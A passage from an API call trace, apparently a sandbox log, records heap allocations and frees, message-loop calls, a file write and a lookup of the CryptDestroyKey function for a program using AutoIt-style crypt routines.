[0263.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe88250 | out: hHeap=0x970000) returned 1 [0263.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0263.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x12b50) returned 0xe88250 [0263.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe62ba0 | out: hHeap=0x970000) returned 1 [0263.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0263.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0263.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0263.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0263.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0263.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0263.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0263.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0263.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0263.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0263.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0263.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0263.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55128 | out: hHeap=0x970000) returned 1 [0263.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0263.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0263.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0263.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0263.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ee0 | out: hHeap=0x970000) returned 1 [0263.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0263.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55138 | out: hHeap=0x970000) returned 1 [0263.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f153a0 | out: hHeap=0x970000) returned 1 [0263.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0263.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0263.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0263.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0263.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0263.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0263.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0263.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0263.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0263.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0263.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c68 | out: hHeap=0x970000) returned 1 [0263.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0263.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe50048 | out: hHeap=0x970000) returned 1 [0263.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0263.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0263.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0263.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0263.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0263.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0263.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0263.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0263.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0263.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0263.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0263.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0263.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0263.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0263.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0263.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0263.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0263.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f3b6c8 | out: hHeap=0x970000) returned 1 [0263.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0263.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0263.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0263.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0263.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0263.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe756f8 | out: hHeap=0x970000) returned 1 [0263.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0263.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0263.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0263.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0263.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0263.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0263.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0263.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0263.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0263.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0263.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0263.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0263.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0263.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0263.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0263.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0263.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0263.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0263.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0263.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f28b70 | out: hHeap=0x970000) returned 1 [0263.777] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0263.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0263.777] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x12b50) returned 0xe50048 [0263.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe88250 | out: hHeap=0x970000) returned 1 [0263.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0263.779] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0263.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0263.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0263.779] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0263.779] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0263.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0263.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0263.779] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0263.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0263.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0263.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0263.779] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x12b50) returned 0x2f16018 [0263.782] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0263.782] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f16018*, nNumberOfBytesToWrite=0x12b50, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f16018*, lpNumberOfBytesWritten=0x8cf5e4*=0x12b50, lpOverlapped=0x0) returned 1 [0263.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0263.784] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f16018 | out: hHeap=0x970000) returned 1 [0263.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0263.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0263.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0263.791] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0263.792] TranslateMessage (lpMsg=0x8cf708) returned 0 [0263.792] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0263.792] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0263.792] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0263.792] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0263.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0263.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0263.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0263.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0263.792] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0263.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0263.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0263.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0263.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0263.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0263.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0263.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0263.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515e0 [0263.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0263.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51640 [0263.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51820 [0263.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0263.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51898 [0263.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0263.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0263.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516d0 [0263.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0263.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0263.793] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0263.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0263.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0263.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0263.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55058 [0263.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0263.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0263.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0263.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0263.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51aa8 [0263.793] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0263.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0263.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0263.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0263.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0263.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0263.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0263.794] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0263.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0263.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0263.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0263.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0263.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0263.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0263.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0263.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0263.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0263.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0263.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0263.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0263.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0263.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0263.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0263.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0263.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0263.795] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0263.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0263.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0263.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51af0 [0263.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0263.795] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0263.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0263.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0263.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0263.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0263.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0263.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0263.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0263.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0263.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0263.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0263.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0263.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0263.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0263.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0263.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0263.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0263.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0263.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0263.796] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0263.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0263.796] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0263.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0263.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0263.797] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0263.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0263.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0263.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0263.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0263.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0263.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0263.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0263.797] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0263.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0263.797] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0263.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0263.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0263.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0263.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0263.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0263.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0263.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0263.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0263.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0263.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0263.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0263.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0263.798] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51958, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0263.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0263.798] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0263.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0263.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0263.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0263.798] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0263.798] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: 